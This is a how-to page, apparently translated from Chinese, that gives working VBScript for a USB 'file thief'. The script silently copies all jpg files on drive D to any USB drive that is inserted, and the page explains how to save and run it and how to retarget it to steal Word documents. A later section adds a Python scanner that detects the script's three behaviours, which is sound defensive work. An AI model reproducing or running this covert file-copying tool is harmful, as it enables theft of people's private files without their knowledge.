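A so-called file "thief" is a program that, when a USB flash drive is plugged into a computer, automatically searches a specified directory or all drives on that computer for files with a specified extension and quietly copies them to the USB drive, thereby "stealing" the files.

The program is simple: copy the code below into Notepad, save it as XXX.vbs, and double-click it to run. When a USB drive is then inserted, the jpg files on drive D are shortly copied to the USB drive without any notification. Note that the example below searches for and copies files with the jpg extension on drive D; modify it as needed. For example, to search for and copy Word documents on the computer, change ExecQuery("Select * from CIM_DataFile where drive='d:' and Extension = 'jpg'") to ExecQuery("Select * from CIM_DataFile where Extension = 'doc' or Extension = 'docx' "). Quite simple, isn't it!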
Const Configuration_Changed = 1
Const Device_Arrival = 2
Const Device_Removal = 3
Const Docking = 4
Set fso = CreateObject("Scripting.FileSystemObject")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colFiles = objWMIService. _
ExecQuery("Select * from CIM_DataFile where drive='d:' and Extension = 'jpg'")
Set colMonitoredEvents = objWMIService. _
ExecNotificationQuery( _
"Select * from Win32_VolumeChangeEvent")
Do
    Set objLatestEvent = colMonitoredEvents.NextEvent
    Select Case objLatestEvent.EventType
        Case Device_Arrival
            'WScript.Echo "U盘插入,盘符为" & objLatestEvent.DriveName
            For Each objFile in colFiles
                'fso.CopyFile objFile.Name,objLatestEvent.DriveName & "\",False
                msgstr=msgstr & Chr(13) & Chr(10) & objFile.Name
                'msgbox InStr(objFile.Name,"$") & Chr(13) & Chr(10) & objFile.Name
                'The check below avoids copying temporary files
                if InStr(objFile.Name,"$")=0 then
                    fso.CopyFile objFile.Name,objLatestEvent.DriveName & "\",False
                end if
            Next
            ' msgbox msgstr 'Show the list of files found
            'msgbox objLatestEvent.DriveName 'Show the USB drive letter
        Case Device_Removal
            WScript.Echo "U盘弹出,盘符为" & objLatestEvent.DriveName
    End Select
Loop
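From a defender's side, the script above stands out through three behaviours occurring together: a WMI subscription to Win32_VolumeChangeEvent, a CIM_DataFile enumeration, and a file copy whose destination is the event's DriveName. The Python triage check below is an added example, not part of the original page; the indicator patterns and function names are its own assumptions, and it does not handle Rem comments.

```python
import re
# Three behaviours that together match the script on this page (patterns are this example's own).
INDICATORS = {
    "volume_event_subscription": r"ExecNotificationQuery\s*\(.*Win32_VolumeChangeEvent",
    "wmi_file_enumeration": r"ExecQuery\s*\(.*\bCIM_DataFile\b",
    "copy_to_event_drive": r"\.Copy(File|Folder)\b.*\.DriveName",
}

def strip_comment(line):
    """Drop a trailing ' comment, ignoring apostrophes inside string literals."""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:i]
    return line

def logical_lines(source):
    """Yield statements with comments removed and ' _' line continuations joined."""
    pending = ""
    for raw in source.splitlines():
        line = strip_comment(raw).rstrip()
        if re.search(r"(^|\s)_$", line):
            pending += line[:-1]
            continue
        yield pending + line
        pending = ""

def scan(source):
    """Map each indicator name to the live statements that matched it."""
    hits = {name: [] for name in INDICATORS}
    for stmt in logical_lines(source):
        for name, pattern in INDICATORS.items():
            if re.search(pattern, stmt, re.I):
                hits[name].append(stmt.strip())
    return hits

def is_suspicious(source):
    return all(scan(source).values())  # every behaviour present in live code

# Constructed sample: statements condensed from the script on this page.
SAMPLE = r'''Set colFiles = objWMIService. _
ExecQuery("Select * from CIM_DataFile where drive='d:' and Extension = 'jpg'")
Set colMonitoredEvents = objWMIService. _
ExecNotificationQuery( _
"Select * from Win32_VolumeChangeEvent")
'fso.CopyFile objFile.Name,objLatestEvent.DriveName & "\",False
fso.CopyFile objFile.Name,objLatestEvent.DriveName & "\",False'''
```

Requiring all three indicators keeps a script that only logs drive arrivals from being flagged, and stripping comments first means commented-out lines do not count as hits.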